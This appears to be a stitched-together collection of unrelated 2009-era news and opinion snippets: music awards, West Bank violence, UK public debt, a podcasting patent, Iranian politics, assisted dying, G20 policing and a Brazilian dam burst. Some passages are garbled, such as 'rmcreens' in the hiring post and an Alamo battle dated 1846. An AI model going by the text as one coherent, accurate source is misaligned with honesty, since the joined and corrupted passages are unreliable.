Trying to tie Austrian Business Cycle Theory to Austrian prejudices against government intervention has been a recipe for intellectual and policy disaster and theoretical stagnation .
Yoko Ono was praised as a ' huge influence on modern music ' John Lennon 's widow Yoko Ono has received a lifetime achievement honour at the Mojo magazine awards in London , the first music prize of her career .
Ono , more used to flak from Beatles fans who thought her main achievement was to cause the band to split , thanked Mojo for their " courageous " decision .
With Lennon and on her own , she has made two dozen albums in 41 years .
" It 's really great that I went on stage and people were very warm towards me , I did n't expect that , " she said .
After picking up the accolade , she added : " For the longest time I never expected people to be so warm when I get on stage . "
Asked what her late husband would have made of the award , Ono replied : " He would have said , ' I told you so , man . '
" He was the only person who was really believing and promoting my work .
Without that I might have been pretty discouraged . "
' Terrible press '
Ono , 76 , received support from other musicians at the ceremony .
Smiths guitarist Johnny Marr said she deserved the award because she had " an awful lot of utterly terrible press that was completely uninformed and out of control for no reason " .
" But also her records are pretty great , " he said , " she did n't really need to be a Beatle wife .
" She was doing some pretty good stuff as it was , and I think she 's fantastic . "
The four members of Blur were back together before their looming live gigs Mark Ronson , who has produced Amy Winehouse and Duran Duran , will perform as part of the Plastic Ono Band at the Meltdown festival in London on Sunday .
He said : " I 'm a fan of hers .
All those early Plastic Ono recordings are just incredible . "
Mojo editor Phil Alexander , who hosted the event , praised Ono as " a huge influence on modern music " .
He said : " She may have been married to one of the most famous men in the world , but she also helped change music as we know it in her own right .
" First , by introducing avant - garde sensibilities to her husband but , just as significantly , by continuing to push the boundaries of what was deemed the norm way after that . "
Other acts honoured by Mojo included Fleet Foxes , who were named best live act , and Elbow , who won best song for One Day Like This .
Paul Weller beat both of those acts to the prize for best album .
The winners of five competitive categories were voted for by readers and another 14 honorary prizes were handed out .
Manic Street Preachers were presented with the maverick award Blur , making their first public appearance together ahead of their forthcoming reunion gigs , collected the inspiration award .
The Manic Street Preachers won the maverick award and bassist Nicky Wire said it was an achievement to have spent 20 years signed to the same major label and still be regarded mavericks .
Johnny Marr said he was " very honoured " to receive the trophy for classic songwriter from former Suede guitarist and Duffy producer Bernard Butler .
Mott the Hoople entered the Mojo Hall of Fame , Joy Division won the vision award and the Pretty Things picked up the hero award .
Phil Lynott , the late lead singer of 1970s rock gods Thin Lizzy , won the icon award .
Island Records founder Chris Blackwell was decorated with the Mojo Medal , rock ' n ' roll pioneer Joe Brown was recognised for his outstanding contribution to music and The Zombies received the classic album award .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Two Palestinians were treated in hospital for serious injuries , medics say
Several Palestinian workers have been hurt in an attack by a group of Jewish settlers in the northern West Bank .
One worker suffered serious head injuries , as dozens of masked settlers threw rocks at their vehicles .
Police say no arrests have been made following the attack near the Palestinian city of Nablus , which is circled by Israeli settlements .
Friction and violence is common between Jewish settlers and Palestinians in the West Bank , captured by Israel in 1967 .
Palestinian medics said two men were taken to hospital , one with a fractured skull , and four others were treated for minor injuries .
The violence happened on a road between Nablus and a nearby settlement called Kedumim , founded by Orthodox Jews in 1975 who believe the West Bank was promised to them by God .
The settlement movement is currently in open conflict with the Israeli government , which has adopted plans to evict small groups of hardline settlers from outposts not officially recognised .
Prime Minister Benjamin Netanyahu announced the plans as he resisted calls from US President Barack Obama to freeze building activity in all settlements , a move correspondents say is Washington 's attempt to relaunch the Israeli - Palestinian peace process .
Israel occupied the West Bank and East Jerusalem during the 1967 war .
It has settled about half a million Jews there , in defiance of international law , amid a population of about three million Palestinians .
Being that it ’s the middle of the year , United Kingdom video game tracking agency ELSPA has released their top 10 list for the United Kingdom ’s best selling video games for the first half of 2009 .
And not surprisingly , Killzone 2 made a strong presence .
The sole Playstation title to top the list was Killzone 2 . Guerilla Games ’ masterpiece finished in 5th place .
Finishing at number one was Wii Fit .
Here is the full list :
01 ) Wii Fit ( Wii )
02 ) Wii Play ( Wii )
03 ) Mario Kart Wii ( Wii )
04 ) Professor Layton and the Curious Village ( DS )
05 ) Killzone 2 ( PS3 )
06 ) Resident Evil 5 ( Xbox 360 )
07 ) Dr Kawashima ’s Brain Training ( DS )
08 ) The Sims 3 ( PC )
09 ) Call of Duty : World At War ( Xbox 360 )
10 ) Mario & Sonic at the Olympic Games ( Wii )
[ Source ]
The Promise of Menu Labeling
I think you can raise rather a lot of money from things like soda taxes .
But I do n't think you 'll do much to change eating habits that way .
Menu labeling , however , is much more interesting .
The reason is not , as some think , that individuals will make radically different decisions because they can see calorie content when ordering a burger ( they might make slightly different decisions , but the evidence , as of yet , is mixed ) .
It 's that restaurants might make different choices when individuals can see the caloric content of their meals .
Restaurants know that consumers have no effective way of comparing the caloric content of meals .
Diners know , of course , that a burger is worse for you than a banana .
But eggs cooked in a vat of butter look like eggs cooked in very little butter .
A salad with a dressing that adds 600 calories looks like a salad with a dressing that adds 300 calories .
People return to restaurants for taste and price and ambiance , because that 's what they can measure .
So restaurants jack up the caloric content pretty heedlessly .
If menu labeling is passed , however , and consumers exhibit any preference toward relatively less fattening items , that creates an incentive to reformulate those items to be less fattening .
California , which recently passed a labeling law for restaurants with more than 20 locations , is seeing this happen .
The Macaroni Grill , for instance , just cut its scallop and spinach salad from an astonishing 1,270 calories -- do they grow the spinach in butter ? -- to 390 calories .
Denny's has slimmed down its Grand Slam breakfast .
And the law has n't even gone into effect yet .
But this is exactly the response we 'd expect .
The Macaroni Grill 's example is a good one .
Ordering the spinach and scallop salad is the sort of thing that you 'd do if you were watching your calories .
But since you did n't actually know how many calories were in the dish , the Macaroni Grill could make it delicious and filling and fatty and you really were n't any the wiser .
That made the Macaroni Grill more attractive to healthy eaters even as it was actually tricking them .
Now customers will know the caloric content , and so the Macroni Grill reformulated the dish so it 's more in line with diner preferences .
Menu labeling , in other words , has the potential to not only change what diners choose , but what they 're offered .
And that could be where its true promise lies .
Photo credit : Ed Ou -- Associated Press Photo .
Four year - old Jonathan Nies reacts as he receives a flu vaccination at Children 's Hospital Boston in Boston , December 12 , 2003 .
REUTERS / Brian Snyder
WASHINGTON ( Reuters ) - All U.S. children aged 6 months to 18 years should get a seasonal influenza vaccine every year , the U.S. Centers for Disease Control and Prevention said on Friday .
The CDC’s Dr. Anne Schuchat said the agency was strengthening recommendations for children to get the vaccination against seasonal influenza , especially with fears that the new H1N1 virus will be added to the already expected burden of seasonal flu .
Total outstanding government debt in the UK has risen to a record £ 799bn , or 56.6 % of UK GDP - the highest since records began in 1974 .
New borrowing in June was £ 13bn , almost twice as much as a year ago , the Office for National Statistics said , after the downturn shrank tax receipts .
The figures also reflect the cost of bank bail - outs and higher spending on social security benefits .
One economist described the state of the public finances as " dire " .
" The figures are modestly better than expected .
It does n't take away from the fact that the state of public finances is dire and that a considerable degree of fiscal tightening will be required , " said Philip Shaw , chief economist at Investec .
The question bankers , business people or politicians ask more than any other is whether the government will be able to borrow all it needs from markets
BBC business editor Robert Peston
Read Robert 's blog " The figures are volatile on a month - on - month basis .
The size of the shortfall and volatility mean there is little to celebrate . "
Analysts had forecast borrowing of £ 15.5 bn in June .
The UK is on track to meet Chancellor Alistair Darling 's forecast of £ 175bn of borrowing this financial year .
' Robust plan required ' Public borrowing for May was revised down to £ 18.6 bn from an initial estimate of £ 19.9 bn .
FROM THE WORLD AT ONE Please turn on JavaScript .
Media requires JavaScript to play .
More from The World At One Business groups warned that , although it appears that public borrowing is in line with the chancellor 's forecast , the government must not sit back .
" It would be wrong to tighten policy while the recession continues , but maintaining Britain 's international credibility requires a robust plan for restoring our public finances over the medium - term , " said David Kern , chief economist at the British Chambers of Commerce .
" This must focus on curtailing public spending across the board , while avoiding damaging measures that would harm wealth - creating businesses . "
Meanwhile , a National Audit Office ( NAO ) report said that tax receipts fell by 10 % in the past year - the biggest fall since 1923 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Hold onto your iPhones — a company called VoloMedia was yesterday granted a patent on a " method for providing episodic media content . "
Or , as the company puts it in today 's announcement , VoloMedia now owns the " US patent for podcasting . "
Prepare to pay up ?
Even the patent 's chief inventor , Murgesh Navar , knows that the claim is controversial .
Before anyone had time to start asking questions about the patent , Navar authored a blog post explaining just why he 's entitled to control podcasting .
The short answer : he 's been working on it for years .
The patent in question " was filed in November 2003 , almost a year before the start of podcasting .
This helps underscore the point , that for nearly six years , VoloMedia has been focused on helping publishers monetize portable media ...
Today , podcasting is 100 percent RSS - based .
However , the patent is not RSS - dependent .
Rather , it covers all episodic media downloads .
It just so happens that , today , the majority of episodic media downloads are RSS - based podcasts , which is why we titled our announcement the way we did . "
That 's right : the claim that this is the " US podcasting patent " is actually too narrow .
In Navar 's view , it actually covers all episodic download services .
If Hulu starts offering shows for download , for instance , it will apparently need to partner with VoloMedia .
" The impact of a strong growing IP portfolio is such that we would expect new entrants into the podcasting arena to have a collaborative relationship with VoloMedia , just as do many of the current players , " wrote Navar .
Or , again , " VoloMedia 's intent is to continue to work collaboratively with key participants in the industry , leveraging its unique range of products to further grow and accelerate the market . "
This sounds like a request to pay up and sign a licensing agreement .
Such licenses can ( usually ) be sought only after the patent is officially granted , but a company does have a limited ability to " go back in time " and negotiate fees .
Once a patent is far enough along in the process , the applicant can notify relevant companies about the application , tell them that it 's in process , and request license fees .
If the patent is in fact granted , the applicant can go to court to seek fees from the date of its notification .
It remains unclear if VoloMedia has done this .
VoloMedia tells
Ars that it does n't intend to embark on a shakedown operation , though .
" Our focus is to generate revenues through our products and technologies , " a company rep tells us .
" VoloMedia is not entertaining or pursuing any licensing conversations ...
VoloMedia ’s main intent is to continue to work collaboratively with key participants in the industry , leveraging its unique range of products to further grow and accelerate the market , not introduce new impediments . "
Who is VoloMedia ?
VoloMedia is an advertising and tracking firm that specializes in podcast - style content , and it has a long list of clients that includes MSNBC , ABC , Fox News , Slate , Scientific American , Public Radio International , and more .
While Navar says that the company has been around for " nearly six years , " the company was actually founded in 2005 , but took over IP from Serenade Systems — another company founded by Navar back in 2002 .
As for the patent application , it says that it was filed in 2008 — but it serves as a continuance to a 2003 patent .
Such procedural moves can keep patent applications alive for years , though this can lead to obvious problems as applicants try to game the system by changing a patent 's language over time to better describe whatever is currently hot in the marketplace .
The USPTO has made rules changes to prevent applicants from " moving the goalposts " this way , and there 's no evidence that Navar 's drawn - out application process was done in bad faith .
The patent describes its " exemplary embodiment " this way : " The method includes providing a user with a dedicated episodic media channel and receiving a subscription request to the dedicated episodic media channel from the user .
Updated episodic media associated with the dedicated episodic media channel is then automatically downloaded to a computing device associated with the user .
The download occurs in accordance with the subscription request of the user . "
Certainly sounds like a podcast .
Reading the patent as a lay person is frustrating , though , since it's hard to pin down what has been " invented . "
Downloading a file ?
No. RSS feeds ?
No .
Checking files against an RSS feed and downloading only those that are new ?
Possibly , though this seems more like a combination of obvious concepts rather than a new " invention " of anything .
The patent contains all sorts of extra ideas , such as pushing a button on some iPod - like device in order to get more information about the podcast now playing or to buy merchandise , but much of this would apply only to selected podcasts , not the concept in general .
Given the stakes involved , the issue will no doubt be hashed out by patent lawyers if VoloMedia pushes to partner with companies who do n't want them as a partner .
We spoke with Andy Hein of the Red Chalk Group , an IP consulting firm , who oversees his company 's " exhaustive invalidity service , " and he explained how such a process works .
If a company like VoloMedia emerges with a broad patent and goes after deep - pocketed industry players , those companies are likely to seek out patent invalidation services to either knock out the patent or to provide valuable leverage in a trial ( which runs about $ 3 million - $ 5 million , on average ) .
Hein notes that digging up prior art on such patents is a big job , but one with significant payoffs .
If investigators can find prior art , they can move to invalidate a patent .
And that art can be in any language from any country .
Red Chalk , for instance , is currently searching Korean , Japanese , European , and American sources for its clients ; even digging up papers from " esoteric conferences " can be good enough to provide companies with ammunition when patent holders come calling .
VoloMedia also announced today that it has filed for twelve patents ; the patent on podcasting is only the first to emerge .
We worden met z’n allen steeds ouder en blijven steeds langer vitaal .
Daarnaast kunnen we steeds meer ziektes behandelen .
Dat is prachtig .
Tegelijk maken mensen zich zorgen over de toekomst van de zorg , die veel geld kost en met een tekort aan werknemers kampt .
Het ministerie van Volksgezondheid , Welzijn en Sport wil dat mensen erop kunnen vertrouwen dat de zorg goed , betaalbaar en beschikbaar is en blijft .
Om dat te bereiken , maakt het ministerie afspraken met zorgverleners om de zorg dichterbij huis te bieden als het kan en zetten we in op preventie .
Mensen hoeven dan minder vaak naar het ziekenhuis of een instelling .
Dat is prettiger voor patiënten .
Ook bespaart dat kosten .
Het ministerie werkt er hard aan om meer mensen te werven voor de zorg en het werk beter te organiseren .
Bijvoorbeeld door een andere taakverdeling en slim gebruik van nieuwe technologie .
Zorg voor mensen , mensen voor de zorg .
Dat is waar wij ons samen voor inzetten .
- video encodings still in process -
U.S.A .
No wonder they lost the battle of The Alamo in 1846 against Mexico , they can't even hold their ground against a gengle lady .
Posted July 01 , 2009
I 've been actively involved in the hiring process at work for over two years now .
Rmcreens , phone interviews , coding phone interviews , lunch interviews , and technical in - person interviews , I get to do it all .
Sometimes it's a minor annoyance that keeps me from coding , other times it 's a nice break in the middle of a busy day .
But recently I 've become more and more frustrated with one section of the process , the rmcreens .
The problem has to do with cover letters , or the lack thereof .
In our system , a rmcreen has seven different criteria , five of which must be met for the applicant to move on to the next stage .
( Four is sometimes accepted , but only for obviously exceptional candidates who might not fit within the strict interpretation of the system . )
Generally , a rman only satisfy three of those seven criteria .
Sometimes we can stretch it and infer one or two more , but it 's rare .
So when an applicant does n't send along a cover letter , I 've got to work harder just to give them a fighting chance ; it does n't endear them to me .
On the other hand , a good cover letter can show me that the applicant meets four of the five required criteria .
Not only do they increase their odds in raw numbers , they also make my job easier , which can only help them .
But not just any cover letter will do .
It does n't seem like it would be that obvious , but I can usually identify a " Dear [ Company Name ] , " cover letter within a few seconds of opening it .
It 's better than no cover letter at all , but it almost automatically loses on two of the four criteria , meaning that the applicant has to nail the five remaining .
They make my job harder , and the raw odds of them getting in are lowered .
So what makes a good cover letter ?
There are a lot of resources out there , but for me it comes down to two simple things : tell me why you want to work at my company and tell me why you want to do the job you are applying for .
Bonus points for showing me those two things .
That 's the generic advice .
Specifically for programmers , show me your previous work , your outside projects , the blog you wrote from scratch , etc .
Take the time .
You can still share a lot of the cover letter between companies .
But make sure the company knows you care by writing a paragraph about what draws you to the company .
Be specific , words like " interesting " and " exciting " do n't add anything .
And try to make my job easier .
The glory days of Microsoft ended with Vista for one reason , and one reason only : Vista Ultimate .
It was part of an ill - advised scheme called " subtractive marketing " or " fake versioning " purposely taking features out of a finished product to create an artificial range or selection .
Who ever dreamed up the Vista Ultimate moniker , I consider that individual responsible for the decline of Microsoft .
This is where the tide turned .
Microsoft had been selling disabled versions of its products for some time , but never went to the extreme that it did with Vista , and now we see the company doing the same thing with .
This is all the same one product , folks .
What is the point of selling six versions of the same code base ?
It does not cost one nickel more to manufacture Windows 7 Ultimate than it costs to manufacture Windows 7 Home Basic , and the differences are confusing to just about everyone .
Microsoft could sell a single version of the new OS at some median price just as easily as it can sell disabled versions of the product for various prices .
The public will realize this eventually .
The psychology is just bad , because the code for Ultimate is done .
Why not just sell everyone Ultimate ?
This is like selling a car that is complete and loaded with everything when it 's manufactured ( we 'll call it the Lincoln Ultimate ) .
But you need a downgraded version of the car , so after the Lincoln Ultimate comes off the assembly line , you rip out the leather seats , discard them , and put in cloth seats , in order to sell the car for less money .
You could have just as easily left in the leather seats .
It would have been easier on everyone !
Or try this analogy .
I walk into a store that is having a sale on coffee mugs with cracked handles .
They are selling for $ 1 instead of $ 10 .
People are buying the mugs for a dollar , and the last one is sold just as I walk in .
" We 're sold out , but here is what I 'll do for you , " the owner says .
He grabs a perfectly good $ 10 mug and cracks off the handle and sells it to me for $ 1 .
I 'm left wondering why he did n't just sell me the mug with the handle intact for $ 1 .
It would cost him nothing more , since it was a good mug he broke .
What would be the point of doing what he did ?
I perceive that something is wrong with this person , especially because he thought he was doing me a favor to move some inventory .
There is a sense of larceny when one witnesses this sort of scam .
The Ultimate product is coded .
It is finished .
Why is Microsoft taking features out of the product after they have been designed in ?
Is the company doing it to create a totally artificial line up of different products for different markets ?
Apparently so , but why ?
The Ultimate product would have serviced all these markets in the first place .
I think this sort of thinking comes from the idea of the value - add .
You sell a basic product , then sell some add - on or plug - in or utility for a little more money .
This , I think , people can fathom and accept , as they did with different versions of Microsoft Office for the school and the home .
So what if the MS - Office for the home does not include , say , PowerPoint ?
Not including something in a bundle is one thing , but disabling features in MS - Word is something different .
The subtractive approach that Microsoft is using generates plenty of ill will .
Someone buys Windows 7 and expects it to have a feature .
But no , you got the wrong version .
XP - compatibility , for example , does not exist on many versions .
This would be a crucial thing to have , especially on the cheaper versions , since people on a budget are more likely to be running old code .
So Microsoft has to field support calls about this and people get irked .
The company should pull the plug on this entire scheme ASAP .
It was the reason Vista failed .
It generates ill - will .
It generates suspicion .
And it 's stupid .
Stop doing it Microsoft !
All this talk about socialized healthcare !
Michael Steele says it 's socialism , although he admits he does n't know a thing about the actual policy .
And as Rachel Maddow points out , have you ever noticed that the more beautiful a politican 's hair , the more likely he is to be completely full of crap ?
Case in point : Texas Gov. Rick Perry .
Maddow really lets him have it because Perry is talking about " seceding " from any national healthcare plan , reminding him ( and us ) that he 's been governor for nine years .
As she points out , one in four Texans lack health insurance , giving Texas the title for highest number of uninsured citizens in the entire country .
As Washington Spectator editor and political author Lou Dubose pointed out to Maddow , the Texas governorship is " a ribbon - cutting position . "
Good thing , because he's not too bright , is he ?
Tehran University 's prayer hall has been the stage for high drama since the early days of the Islamic revolution , and Hashemi Rafsanjani 'sappearance today was another of many electrifying moments in Iran 's recent history .
Surrounded by heavy security under the cantilevered roof , the former president spoke out in public for the first time since last month 's disputed election , warning that the country was " in crisis . "
That may be a statement of the blindingly obvious – but it carries force precisely because of Rafsanjani 's special place in Iranian politics : he is both hugely influential and deeply unpopular , a bitter rival of the supreme leader Ayatollah Ali Khamenei and – crucially – one of the surviving giants of the revolutionary era .
Whatever he said , his very presence at such a tense time would have guaranteed rapt attention – one reason why his sermon was not , as is usual , broadcast live on state TV whose cameras are mounted permanently in the university mosque .
The sense of excitement was heightened because of the presence of Mir Hossein Mousavi , who claims to have beaten Mahmoud Ahmadinejad on 12 June and who rejects the election result as " illegitimate . "
His fellow candidate , the reformist cleric Mehdi Karoubi , was also there .
Rafsanjani's calls to restore trust by releasing prisoners , freeing the media , using only legal means , and by dialogue between opposition and the regime , were couched in the language of legitimacy and justice .
" Do n't let our enemies laugh at us by putting people in prison , " the cleric urged .
" We must search for unity to find a way out of our quandary . "
Specific proposals had been laid before the expediency council ( an advisory body to the supreme leader ) he said , a reminder that he has a real role to play .
" His demands were in line with what the reformists want but he did not explicitly challenge the legitimacy of the Ahmadinejad government , " concluded one veteran Iranian political analyst .
" This was an effort to play the role of power - broker – the role that Khamenei should have played but did not . "
Rafsanjani also stressed the importance of the " republic " in the Islamic Republic of Iran , a deliberate riposte to those hardliners who stand accused of planning an Islamic dictatorship .
His references to Ayatollah Khomeni praised the late leader 's positive attitude towards ordinary people – a clear invitation to make an unflattering comparison with Khamenei .
The sermon was not an overt challenge to the regime , but it did graphically underline the divisions he was warning about : as he was speaking the crowd burst into competing slogans of " death to the dictator " and " death to opponents " .
No one could have had any doubt who was who .
Predictably , trouble erupted in the streets immediately afterwards .
Normally , Friday prayers at Tehran University are a showcase for the regime , which makes sure that thousands of its loyal supporters are bussed in to fill the hall and shout familiar slogans : death to America , death to Israel , and other favourites .
That makes it a regular port of call for foreign journalists , invited to witness the peculiarly Iranian combination of religion and politics , prayer and agitprop .
Foreign media coverage has been drastically reduced as part of the post-election crackdown .
But profound divisions , not defiant unity , are now on open display .
There is no justification for a claim that Christianity must oppose the assisted death of a person who has made their own decision to die , provided that such a person can convince others that their desire to die is fully considered .
I will make this argument given two conditions : first that the person is capable of making an educated decision , and second that their end - of - life experience includes full access to both pastoral and medical care .
The most common faith - based complaint is that life must be preserved at all costs because it is sacred .
However , not many would dispute a right to self defence which may sometimes require lethal force .
Furthermore , our social structures are designed to allow for life to be lost as an unfortunate but unavoidable consequence .
It is clear that no functional transport system , for example , could be made entirely safe .
If life were irreducibly sacred , all of these points would be of great concern ; that they are not seems to provide evidence that life fails to be sacred in the sense that would allow it to be used as an indefeasible trump against assisted dying .
More specifically , one familiar position from those with a faith - based opposition to assisted dying is that when a patient is undergoing medical treatment , even if such patients no longer want to live , they must be made to stay alive for as long as possible because God alone can decide when one may die .
I 'll accept a claim that God 's will is decisive .
Having done so , I cannot then understand how God 's decisive will can consistently approve of medical intervention to sustain life against a natural end , but not approve intervention so that a patient can find death when that patient no longer wants to be kept alive by medical intervention .
The God in whom I believe is nothing if not consistent ; a good God must be , by definition .
On the topic of God 's nature , my next reason for believing that God is in favour of the possibility of assisted dying is based in God being both loving and perfect .
I am unlikely to accept as " loving " the sort of god that demands that we suffer unnecessarily .
I do not say that it is possible to always avoid all suffering .
I do say that I find it incompatible with my conception of God that a patient be effectively tortured by being kept alive with no hope of anything but pain and deterioration .
God would not want that to happen to me ; he thinks more of me than that .
Having been created in God 's image , my third reason here for supporting self - aware assisted death , is the most telling .
My faith , based on my understanding of the life and works of Christ , tells me that I will have to account for the choices that I make .
The teaching of Christ is all about refusing to accept conventional religious wisdom , which would be easy but thoughtless , and instead steadfastly making one 's own moral choices .
Jesus chose to die rather than compromise this point .
The gift that God has given to me is not life , but choices .
There are no reductivist solutions to human ethics .
Each choice is hard , and I expect to work hard to fathom out what seems to me to be good .
I expect to be personally responsible for my choices .
I expect you to be responsible for yours too , even if I disagree with what you decide .
So , the most reprehensible insult to God in my view is paternalism ; the taking away of my God - given gift to make my own moral decisions and be responsible for them .
No one else can decide the value of my life for me , when it has no further use , I will end it – with or without assistance .
I will expect to have to explain myself to God .
In my view , of course , those who do prevent moral choice are actually making moral choices for which they themselves will have to account .
There is no reason from Christianity why the law should prevent assisted dying , at least so far as those wanting to die are self - aware and sane .
The presence of such law would allow a dignified end to those wanting to have one , without requiring others to die against their wishes .
Metropolitan police commanders at the G20 demonstrations ordered officers to clear the streets of protesters using " reasonable force " if necessary , minutes before a police constable attacked the newspaper vendor Ian Tomlinson , it emerged tonight .
Decisions taken by senior
Met officers in the lead - up to Tomlinson 's death were set out for the first time in an official report today into the policing operation at the protests in the City of London .
The report , by Denis O'Connor , the chief inspector of constabulary , found serious failings in the Met 's policing operation and recommended a far - reaching overhaul of the way protests are policed in the future .
Nationwide tactics for policing protests are outdated and inadequate , and pay insufficient regard to human rights obligations , it said .
The previously unseen police logs from 1 April include two tactical orders that shed light on events surrounding Tomlinson 's death and more than 50 complaints made to the Independent Police Complaints Commission about alleged excessive force .
At 12.20 pm , soon after the protests at the Bank of England had started , a Met Bronze commander , responsible for operational tactics on the ground , sowed confusion by ordering that police cordons placed around protesters in the so - called " kettle " should be " absolute cordons with discretion " .
O'Connor 's report described the instruction as " confusing and difficult to implement " for officers , who had to handle crowds that were far larger than senior officers had expected .
The report also revealed how senior officers met later in the day , after the most serious clashes had dissipated , to discuss how to manage a crowd that was assessed by police as " hostile , with continuing sporadic outbreaks of violence " .
Senior officers decided that from 7 pm " reasonable force would be used " to clear the streets of those who did not leave the area voluntarily .
At 7.15 pm , Tomlinson , who had been prevented from passing three police cordons as he tried to find a route home , was struck from behind and pushed to the ground by a Met officer who has since been suspended .
His widow , Julia , said tonight that the commander 's logs had made difficult reading .
" They ordered that Ian could not leave and they ordered the use of force , " she said .
" If Ian is to get justice it means then all the officers who played a role in his death are made to account for what they did . "
O'Connor stopped short of arguing that kettling should be abandoned .
But he found commanders did not understand their legal duties when they decided to contain thousands of protesters at the Bank of England and the Climate Camp , in nearby Bishopsgate .
Warning of the consequences if senior officers ignored his advice , O'Connor said there could be more disruption on the streets , police forces challenged in court and a withdrawal of the public 's consent to policing .
Sir Hugh Orde , the incoming president of the Association of Chief Police Officers , said the problems encountered by the Met might not have arisen if human rights had been put at the centre of operational decisions .
The Met accepted the recommendations and launched an urgent review of training and tactics at protests .
Four people have been killed and an unknown number are missing after heavy rainfall caused a dam to burst in Piaui state , in north - east Brazil .
State governor Wellington Dias has described the flooding around two towns which reached up to the level of three - storey buildings as a " tsunami " .
Brazil 's TV Globo reported almost 50bn litres of water escaped in less than an hour , devastating the valley below .
The search for missing people is due to resume on Friday .
Swelling river
The four people killed in the partial rupture of the dam included two young girls aged 10 and 12 , a 72 - year - old man and a 73 - year - old woman , the state government said on its website .
Heavy rains in recent days swelled the reservoir behind the dam , increasing pressure that opened a 50 m tear and eventually led to the rupture , the Piaui state government said in a statement .
When the dam broke a huge column of water shot up 50 m into the air ... it swept away everything
Local farmer
The only video footage of the breach in the dam was taken with a mobile phone , says the BBC's Gary Duffy in Sao Paulo .
In the short rather indistinct images a torrent of water can be seen gushing outwards , our correspondent says .
People rushed to higher ground scrambling to rooftops as the floodwaters suddenly swelled a river .
" I heard a very loud thundering noise , and when the dam broke a huge column of water shot up 50 m into the air , and when it came down it swept away everything in its way , " said farmer Jose Maria Siqueira , quoted by the Globo TV website .
Recent overflow
The number of houses swept away is not yet known but thousands of people were forced to seek shelter elsewhere .
Crops and livestock have also been lost .
" It was a lot of water , " said resident Antonio Antonino .
A torrent of water gushed outwards displacing thousands " People were desperate , they were crying .
I 'm 60 years old , and I 've never seen anything like this , " Mr Antonino added .
Heavy rains in the area had caused water behind the dam to overflow two weeks ago , but it seems a build - up of pressure eventually forced a section to give way .
People still in the area say they heard a huge sound as the dam broke , and some scrambled into trees or onto the roofs of their homes for safety .
Some local people said they had been told it was safe to return to the area , and it seems certain questions will be asked about whether the best safety procedures were followed .
Flooding in the north and north east of Brazil , which began in April , is now said to have led to 56 deaths and displaced 426,000 people who are either staying with relatives and friends or are in public shelters .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
As the world gears up for the 2010 World Cup , mobile operators abroad are salivating over the prospect of snagging millions of new customers by offering mobile phones that let them watch the matches for free using television signals – a strategy perfected by Chinese telecoms during last year 's Olympic games .
Although Americans have yet to catch the soccer bug that affects the rest of the world , we love our sports , television , and electronics as much or more as any country .
So why , especially now that every broadcaster in the country is finally serving up free , digital , over - the - air television signals , are n't cellphone manufacturers taking advantage of those free signals by incorporating DTV tuners into our phones ?
Cellphones do n't even have TiVo .
We 'd watch every ad – especially during major sporting events , which do n't always keep until we get home to our big screens .
The problem is n't technical , according to industry watchers .
" The biggest hurdle for the North American [ mobile television ] market is culture , " said Tuong Nguyen , lead mobile TV analyst for Gartner Research .
" It 's just not something that appeals to us . "
American cell networks lag behind those in the rest of the world because our country is large , and because our government allowed competing cell network to fight over standards rather than mandating a standard .
But that 's just part of the reason we can't ( or do n't ) watch TV on our phones , despite having just shifted to an all - digital broadcast model .
For instance , Qualcomm and MobiTV having invested millions in technology for putting television on our cellphones on a monthly subscription basis .
Partly it 's about how we get around .
" I 'm from California , and everyone in California owns at least one car , and everyone drives themselves to work , " said Nguyen .
" So we 're not watching television [ during that time ] , as opposed to these other regions that people in the industry like to point to [ as an indication that Americans will start watching mobile TV ] .
That 's not true , unless everyone starts taking public transportation all the time . "
The vast majority of Americans simply prefer to watch television on large screens , and many of us have the technology to do so at our leisure .
Those of us who are willing to watch on small screens demand better video quality and the ability to watch whenever we want , using time - shifting or on - demand technologies .
" In the US , a relatively small portion of consumers want it , because of the limitations on programming choice , timing , et cetera , " said Flint Pulskamp , program manager for IDC 's wireless semiconductor research group .
" Those few people [ who do want mobile TV ] apparently are more particular with the quality of their programming , so the industry has responded with subscription mobile video services such as [ Qualcomm's ] Flo TV . "
Although free digital television signals are omnipresent , the small percentage of Americans who want to watch mobile television are going to have to pay for it .
" Studies suggest that $ 15 per month is acceptable to a majority of the target audience , to avoid advertising and maintain quality of service [ while ] others argue that it needs to be free and ad - supported to really gain traction , " said Pulskamp .
" Regardless , free - over air [ broadcasts ] will likely have a very slow uptake , and the very limited number of phones with tuners will make it even slower . "
Instead , he says , North Americans will have to order programs piecemeal for more expensive , one - to - one delivery .
Since digital television signals are all around us — for free — why are we going to have to pay to watch on our phones ?
According to Nguyen , the manufacturing costs outweigh the benefit to consumers , even if all the content is free .
" You do n't want to make every phone with everything on it , because obviously it adds to total bill of materials , " explained Nguyen .
" It only adds a couple bucks here and there , but when you talk about all these components , it starts to add up . "
In addition to a chip for pulling in DTV signals , he said , these phones would need larger , more vibrant displays , touch screens or other controls , and a better speaker .
Because Americans wo n't use the tuner anyway , manufacturers leave it out of most phones sold here .
" Remember those portable TVs from the ' 80s ? " asked Nguyen .
" How many people [ in America ] had those ?
And that was free .
Now , they want 15 , 30 , 40 , or 50 bucks to watch it on a two - inch screen .
Are you kidding me ? "
See Also :
Photo : ㅁboy
Under construction By Damir - Olejar Watch
317 Favourites 45 Comments 14 K Views
A church under construction , belgrade , hram svetog save
- By the request -
Camera : Argus DC - 6340 , digital , 6.0 megapixels
Settings / equipment : Automatic , taken by holding the camera in hands .
The low ambient light inside the church .
Software processing :
The panoramic joining of the images with heavy pseudo - HDR rendering .
- Copyrights -
You may use this photo for anything you want , except that I must be credited by putting my name ( Damir Olejar ) somewhere beside it .
IMAGE DETAILS Image size 1430x1800px 2.58 MB
Show More
“ In the next few months , we 'll see the tacitly nationalized banks — Bank of America , Citigroup — sold off rapidly into pieces , turned into much smaller banks , ” Sanders Morris Harris Group Chairman George Ball predicted on CNBC Thursday , adding the government wants to send a strong message , to “ punish too - big - to - fail banks that have blotted their copy and not exonerate their management . ”
“ Five years from now , these banks will be broken up , ” is how FBR Capital Markets bank analyst Paul J Miller sees it .
From Washington to Wall Street to Main Street , a dramatic change in conventional thinking appears to underway .
“ Some institutions are too big to exist , because they are too interconnected , " Sen . Richard Shelby ( R - Ala . ) told CNBC earlier this week .
“ The regulators ca n’t regulate them . ”
